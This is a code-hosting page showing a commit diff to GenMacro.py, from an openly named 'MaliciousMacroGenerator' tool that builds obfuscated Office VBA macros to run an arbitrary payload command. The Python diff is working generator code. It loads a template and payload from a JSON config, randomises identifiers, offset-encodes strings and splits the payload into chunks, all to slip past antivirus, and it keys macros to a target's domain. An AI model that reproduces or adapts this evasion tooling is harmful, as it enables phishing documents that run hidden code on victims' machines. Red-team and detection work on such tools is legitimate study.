infosecn1nja
/
MaliciousMacroGenerator
mirror of https://github.com/infosecn1nja/MaliciousMacroGenerator.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update GenMacro.py

patch-1
Mr-Un1k0d3r 2016-09-22 12:29:40 -04:00 committed by GitHub
parent e49af1947d
commit 265db352f7
1 changed files with 71 additions and 27 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

98
GenMacro.py
View File

@ -3,6 +3,32 @@ import random
import string import string
import os import os
import re import re
import json
def load_config(filename):
config = load_data(filename)
items = {}
try:
items = json.loads(config)
except:
print "[-] \"%s\" is not a valid config file." % filename
exit(0)
return items
def get_config(config, key):
if config.has_key(key):
return config[key]
else:
print "[-] \"%s\" not found in the config file." % key
exit(0)
def get_config_vars(config):
vars =get_config(config, "encodedvars")
return vars
def show_description(config):
description = get_config(config, "description")
print "[*] Payload: %s" % description
def gen_var(size): def gen_var(size):
return ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size)) return ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size))
@ -10,26 +36,35 @@ def gen_var(size):
def gen_int(size): def gen_int(size):
return ''.join(random.SystemRandom().choice(string.digits) for _ in range(size)) return ''.join(random.SystemRandom().choice(string.digits) for _ in range(size))
def encode_data(buffer, offset): def randomize_vars(buffer, vars, iter):
data = ""
for c in buffer:
data += chr(ord(c) + int(sys.argv[3]))
return data
def randomize_vars(buffer, vars):
for var in vars: for var in vars:
for i in reversed(range(1, 40)): for i in reversed(range(1, iter)):
buffer = buffer.replace(var + str(i), gen_var(random.randrange(5, 20))) buffer = buffer.replace(var + str(i), gen_var(random.randrange(5, 20)))
return buffer return buffer
def randomize_int(buffer): def randomize_int(buffer, var, min, max, iter):
for i in reversed(range(1, 40)): for i in reversed(range(1, iter)):
buffer = buffer.replace("[int" + str(i) + "]", gen_int(random.randrange(3, 5))) buffer = buffer.replace("[" + var + str(i) + "]", gen_int(random.randrange(min, max)))
return buffer return buffer
def encode_domain(buffer, domain, offset): def encode_data(buffer, offset):
domain = encode_data(domain, offset) data = ""
buffer = buffer.replace("[DOMAIN]", domain) for c in buffer:
data += chr(ord(c) + int(offset))
return data
def encode_config_vars(buffer, vars, offset):
for var in vars.keys():
buffer = replace_var_encode(buffer, var, vars[var], offset)
return buffer
def replace_var_encode(buffer, var, data, offset):
encoded = encode_data(data, offset)
buffer = buffer.replace("[" + var + "]", encoded)
return buffer
def replace_var(buffer, var, data):
buffer = buffer.replace("[" + var + "]", str(data))
return buffer return buffer
def gen_chunk(buffer, payload, offset): def gen_chunk(buffer, payload, offset):
@ -61,7 +96,7 @@ def load_data(filename):
buffer = open(filename, "rb").read() buffer = open(filename, "rb").read()
return buffer return buffer
else: else:
print "[-] \"%s\"File not found." % filename print "[-] \"%s\" file not found." % filename
exit(0) exit(0)
def save_macro(filename, buffer): def save_macro(filename, buffer):
@ -73,32 +108,41 @@ def save_macro(filename, buffer):
print "[*] Saving \"%s\" as the final macro" % filename print "[*] Saving \"%s\" as the final macro" % filename
def banner(): def banner():
print "MaliciousMacroGenerator V1.0 - charles.hamilton@mandiant.com RingZer0 Team" print "Malicious Macro Generator V1.1 - RingZer0 Team\nAuthor: Mr.Un1k0d3r charles.hamilton@mandiant.com\n"
def help(): def help():
print "Usage: %s [template] [domain] [offset] [payload] [output]\n\n\ttemplate\tTemplate macro\n\tdomain\t\tTarget domain name (USERDOMAIN env variable value)\n\toffset\t\tEncoding offset (default 3)\n\tpayload\t\tPayload to be executed\n\toutput\t\tOutput filename" % sys.argv[0] print "Usage: %s [config] [output]\n\n\tconfig\tConfig file that contain generator information\n\toutput\t\tOutput filename for the macro" % sys.argv[0]
if __name__ == "__main__": if __name__ == "__main__":
config = ""
data = "" data = ""
iter = 0
vars = ["var", "func", "data", "cond", "int"] vars = ["var", "func", "data", "cond", "int"]
offset = 0 offset = 0
domain = "" domain = ""
banner() banner()
if len(sys.argv) < 6: if len(sys.argv) < 3:
help() help()
exit(0) exit(0)
offset = int(sys.argv[3]) config = load_config(sys.argv[1])
domain = sys.argv[2] show_description(config)
offset = int(get_config(config, "encodingoffset"))
data = load_data(get_config(config, "template"))
iter = int(get_config(config, "varcount"))
data = replace_var(data, "OFFSET", offset)
data = load_data(sys.argv[1]) data = randomize_int(data, "SMALLINT", 1, 2, iter)
data = randomize_int(data) data = randomize_int(data, "INT", 2, 5, iter)
data = randomize_vars(data, vars) data = randomize_vars(data, vars, iter)
data = encode_domain(data, domain, offset)
data = gen_chunk(data, sys.argv[4], offset)
save_macro(sys.argv[5], data) template_vars = get_config_vars(config)
data = encode_config_vars(data, template_vars, offset)
print "[*] Completed" data = gen_chunk(data, get_config(config, "payload"), offset)
save_macro(sys.argv[2], data)
print "[*] Macro generation is completed"